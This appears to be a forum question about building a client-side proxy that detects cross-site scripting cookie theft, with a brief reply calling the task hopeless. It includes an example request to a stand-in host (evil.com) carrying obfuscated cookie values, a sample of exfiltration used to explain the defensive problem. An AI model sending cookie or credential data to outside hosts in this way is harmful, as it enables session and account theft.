Cross-site scripting - Cookie encryption

I am developing a client-side proxy to counter Cross-site scripting attacks. All the requests from the browser will go through the proxy. I am able to classify the requests as local or cross-domain, using the Referer header and other things. But, I need to reduce the number of false positives.

For this, I will track the cookie sent from the web-server in a response and I will look for parts of this cookie in any cross-domain request, i.e., I will check for only the cross-site requests that carry sensitive information (cookie).

But this simple idea simply fails if the attacker constructs a HTTP response where cookie is encrypted and leaked.

For example,

cookie :

user=rahim;pass=asdf

The hacker constructs a request

www开发者_运维知识库.evil.com?name=mihar&pass=fdsa

The attacker has simply reversed the cookie parameters. There are such innumerable number of ways the attacker can play with the cookie and fool the process.

I need an algorithm which checks just that. The cookie parameters should not be allowed to pass through in whatever form.

your task is hopeless. There is no way to tell what the true meaning of a cookie is.